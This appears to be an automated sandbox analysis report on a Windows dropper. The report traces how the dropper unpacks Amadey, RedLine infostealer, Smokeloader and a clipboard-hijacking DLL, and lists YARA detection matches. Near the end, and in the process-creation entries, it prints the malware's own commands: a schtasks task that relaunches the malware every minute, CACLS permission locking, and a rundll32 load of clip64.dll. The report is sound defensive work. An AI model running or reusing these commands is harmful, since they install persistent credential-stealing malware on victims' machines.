                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040DC112_2_0040DC11
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00407C3F2_2_00407C3F
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00418CCC2_2_00418CCC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00406CA02_2_00406CA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004028B02_2_004028B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004182442_2_00418244
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004016502_2_00401650
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402F202_2_00402F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004193C42_2_004193C4
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004187882_2_00418788
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402F892_2_00402F89
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402B902_2_00402B90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004073A02_2_004073A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02020DA72_2_02020DA7
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02020DB02_2_02020DB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010C853014_2_010C8530
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010C754D14_2_010C754D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010A646014_2_010A6460
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A31F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 010B7CE0 appears 35 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 010B5E20 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: String function: 0040E1D8 appears 44 times
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 431118 bytes, 2 files, at 0x2c +A "brJg.exe" +A "xriv.exe", ID 1582, number 1, 20 datablocks, 0x1503 compression
                              Source: brJg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 239238 bytes, 2 files, at 0x2c +A "arJf.exe" +A "nika.exe", ID 1542, number 1, 12 datablocks, 0x1503 compression
                              Source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arJf.exe.logJump to behavior
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A33FEF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0202A1A8 ChangeServiceConfigA,2_2_0202A1A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A34FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A34FE0
                              Source: file.exeReversingLabs: Detection: 69%
                              Source: file.exeVirustotal: Detection: 51%
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A31F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A3597D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00A32BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCommand line argument: Kernel32.dll1_2_00F82BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCommand line argument: 08A2_2_00413780
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: wextract.pdb source: file.exe, brJg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000E.00000000.394369817.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000000.395468637.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000000F.00000002.775153494.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000002.404223477.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000000.402551757.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000002.412679871.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000000.412460311.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.539131975.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.538897999.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000002.667838204.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000000.667524301.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, brJg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: brJg.exe, 00000001.00000003.252066347.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, brJg.exe, 00000001.00000003.251774112.0000000004E86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000D.00000000.369407465.0000000000142000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: KC:\jovoxomexep_yuyobib\topaduseyese.pdb source: arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.775394755.000000006FB9F000.00000002.00000001.01000000.0000000D.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: *C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeUnpacked PE file: 2.2.arJf.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeUnpacked PE file: 2.2.arJf.exe.400000.0.unpack .text:ER;.data:W;.baveke:R;.hewi:R;.zax:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3724D push ecx; ret 0_2_00A37260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F8724D push ecx; ret 1_2_00F87260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_020248B5 push ss; retf 2_2_020248B7
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02024139 push edi; iretd 2_2_0202414E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0202454E push ecx; retf 2_2_02024554
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A3202A
                              Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                              Source: arJf.exe.1.drStatic PE information: section name: .baveke
                              Source: arJf.exe.1.drStatic PE information: section name: .hewi
                              Source: arJf.exe.1.drStatic PE information: section name: .zax

                              Persistence and Installation Behavior

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 2728, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A31AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F81AE8

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
